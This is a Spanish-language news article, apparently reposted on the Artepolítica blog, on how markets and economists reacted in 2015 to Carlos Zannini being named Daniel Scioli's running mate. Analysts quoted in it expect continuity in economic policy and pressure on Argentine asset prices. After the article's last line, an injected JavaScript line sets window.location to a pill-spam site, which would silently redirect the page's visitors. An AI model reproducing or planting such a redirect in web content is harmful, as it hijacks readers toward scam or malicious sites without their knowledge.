Temor por la permanencia del modelo

Elecciones 2015 / El escenario que abre el anuncio de la fórmula oficialista
Analistas creen que se reducen las chances de que haya cambios en la política económica
La marcación a presión y personal que hará el kirchnerismo sobre Daniel Scioli, según dejó a la vista la designación consensuada de su compañero de fórmula conocida en la tarde noche de ayer, pondrá hoy presión sobre los precios de los activos argentinos en el exterior, coincidían en alertar anoche financistas y hombres de mercado.
«Que el elegido haya sido Carlos Zannini es toda una definición. El Gobierno lo que parece intentar asegurarse también por esta vía es una continuidad. Y no es la idea con que se venía manejando el mercado, aun imaginando a Scioli como presidente», explicó el encargado de la mesa de negocios de un banco local. Los activos locales habían acumulado alzas del 30% promedio en la primera parte del año, buena parte de las cuales estuvieron impulsadas por el ingreso de fondos del exterior. Se trató en su mayoría de apuestas de grandes fondos de inversión que, en los últimos años, habían reducido fuertemente la porción de papeles argentinos que tenían en sus carteras y, con la vista puesta en el cambio de gobierno y la idea de un «final de ciclo», habían comenzado a retomarlas.
Ese flujo de fondos se detuvo desde abril, lo que dejó los precios virtualmente amesetados desde entonces. De allí la expectación con la que desde anoche ya se espera el test de mercado que se afrontará hoy. «No paro de atender llamados. Creo que esto va a provocar una corrección de precios que empezará afuera y, desde allí, contagiará al mercado local», aventuró otro operador. Algunas de esas señales de inquietud ya se comenzaron a notar anoche, cuando la devaluación del peso esperada en Nueva York (plaza a la que no llega el BCRA con sus intervenciones) trepó del 16 al 19 por ciento para los contratos por vencer en 90 días.
Los economistas se mostraron muy cautos a la hora de evaluar el impacto que tendrá el anuncio en los mercados, pero la coincidencia general es que la elección de Zannini ratifica la idea de que un eventual gobierno de Scioli implicará una continuidad en la política económica. «La primera sensación es que si gana Scioli no habrá muchos cambios, con lo cual es esperable que la reacción de los mercados no sea la mejor, y más teniendo en cuenta que la imagen de Scioli está muy consolidada a la hora de pensar quién puede ser el próximo presidente», explicó Camilo Tiscornia.
«Es una noticia difícil para Scioli porque refuerza la imagen de continuidad, sin ningún tipo de cambio. E indirectamente también implica un respaldo hacia la política de Axel Kicillof, cuya gestión depende en gran parte de Zannini», aseguró Orlando Ferreres.
Los analistas además coincidieron en que la fórmula Scioli-Zannini favorece a Macri. «Ante una disyuntiva cada vez más clara entre cambio y continuidad, la elección de Zannini ratifica la idea de que Scioli significa más de lo mismo. Conceptualmente, no hay muchas diferencias entre elegir a Zannini y poner a Máximo Kirchner en la fórmula», sostuvo Carlos Melconian.
Ferreres, por su parte, fue un poco más lejos en la lectura sobre el impacto en las posibilidades de Macri: «Lo más probable es que los mercados reaccionen negativamente ante el anuncio»..

window.location = «http://cheap-pills-norx.com»;

Acerca de Artepolítica

El usuario Artepolítica es la firma común de los que hacemos este blog colectivo.

Ver todas las entradas de Artepolítica →

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *